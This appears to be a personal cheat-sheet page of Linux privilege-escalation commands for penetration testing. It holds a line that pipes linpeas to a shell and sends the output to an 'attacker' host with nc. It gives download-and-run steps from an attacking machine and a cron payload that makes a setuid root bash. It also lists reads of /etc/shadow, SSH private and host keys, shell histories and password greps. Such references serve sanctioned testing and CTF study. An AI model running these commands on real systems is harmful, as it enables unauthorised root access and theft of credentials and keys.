drwxr-xr-x 8 root root 4096 Dec 14 2017 SMB and RPC Enumeration drwxr-xr-x 8 root root 4096 Dec 14 2017 Web Enumeration drwxr-xr-x 8 root root 4096 Dec 14 2017 Linux PrivEsc drwxr-xr-x 8 root root 4096 Jun 15 2021 Linux Commands drwxr-xr-x 8 root root 4096 Feb 24 2022 DDoS SMB TL;DR You can grab and parse these commands from this page using cURL: curl -s https://harfordcda.neocities.org/privesc.html | sed 's/<[^>]*>//g ; /^$/d'| tr -s '\n' '\n' | sed -r /^r?$/d > privesc.txt

           |`-.._____..-'|
           :  > .  ,  <  :
           `./ __`' __ \,'
            | (|_) (|_) |
            ; _  .  __  :
            `.,' - `-. ,'
              `, `_  .'
              /       \
             /         :
            :          |_
           ,|  .    .  | \
          : :   \   |  |  :
          |  \   :`-;  ;  |
          :   :  | /  /   ;
           :-.'  ;'  / _,'`------.
           `'`''-`'''-'-''--.---  )
                            `----'
Type help for a list of interactive commands.
#################################### Privesc #################################### Rule of shells: One is none and Two is one #################################### Automated scripts for detecting Linux PrivEsc issues: LinEum LinuxPrivChecker LSE Linpeas #Grabbing automated script from staging machine #winPeas wget https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O winPEASx64.exe powershell Invoke-WebRequest -Uri http://attackingmachine:8081/winPeas.exe -OutFile winPeas.exe #linpeas curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh #attacking machine launch a web server to grab the privesc scripts python -m SimpleHTTPServer 8080 or python3 -m http.server 8080 #downloading from victim wget http://attackingmachine:8080/linPeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh #Or execute in memory send output back to attacker curl attacker:8000/linpeas.sh | sh | nc attacker 9002 #################################### Kernel Version? #################################### dmesg | grep Linux uname -a cat /etc/issue cat /proc/version rpm -q kernel #redhat #################################### Check sudoers #################################### cat /etc/sudoers sudo -l #################################### #Find SUID and SGID files under root #################################### find / -perm -u=s -type f 2>/dev/null find / -perm +4000 find / -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null #################################### #Find GUID #################################### find / -perm -g=s -type f 2>/dev/null #################################### #Sticky bit: #################################### find / -perm -1000 -type d 2>/dev/null #################################### #Abusable binaries GTFO Bins #################################### Over write miscofig files: #################################### echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/misconfig.sh #wait until the cron job triggers your payload /tmp/bash -p #################################### Locating world writable files/dirs/scripts that run as root #################################### #World writable files directories find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null find / -perm -o x -type d 2>/dev/null find / \( -perm -o w -perm -o x \) -type d 2>/dev/null #################################### #Common locations for user installed software #################################### /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/ cut -d ':' -f 7 /etc/passwd | sort -u #################################### Which development tools/languages are installed? #################################### find / -name perl* find / -name python* find / -name gcc* find / -name cc #################################### Which services are running and with which user priv? ps aux ps -ef top cat /etc/services #################################### Check running processes running as root: ps aux | grep root ps -ef | grep root #################################### User and Root home directories: #################################### ls -ahlR /root/ ls -ahlR /home/ #################################### Which services are running and with which user privilege? #################################### ps aux ps -ef top cat /etc/services #################################### Which cron jobs are scheduled? #################################### ls -la /etc/cron.d crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root #Breakdown #m h dom mon dow user command 17 * 1 * * * root /home/fred/desktop/backup.sh # = ID m = Minute h = Hour dom = Day of the month mon = Month dow = Day of the week user = What user the command will run as command = What command should be run #################################### What is the configuration of the available services? #################################### cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ #################################### Network Settings #################################### /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network ip addr #################################### What are the network configuration settings? #################################### cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L -v hostname dnsdomainname #################################### Which users and hosts are communicating with the system? #################################### lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w #################################### Can user information can be found? #################################### cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root #################################### Finding juciy files #################################### What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ /etc/apache2/httpd. /etc/apache2/apache2 /etc/httpd/httpd /etc/httpd/conf/httpd #################################### Any pasword entries? What else? #################################### cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history grep --color=auto-R -i "passw" --color=always 2> (grep -v 'Permission denied' >&2) grep --color=auto -rnw '/' -ie "PASSW" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSW" {} /dev/null \; #################################### Can private key information be found? #################################### cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key #################################### Which IPs and/or MAC addresses are cached? #################################### arp -e route /sbin/route -nee #################################### How can files be uploaded? #################################### find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp find / -name ncat* #################################### Other references: gotm1lk mubix Swisskyrepo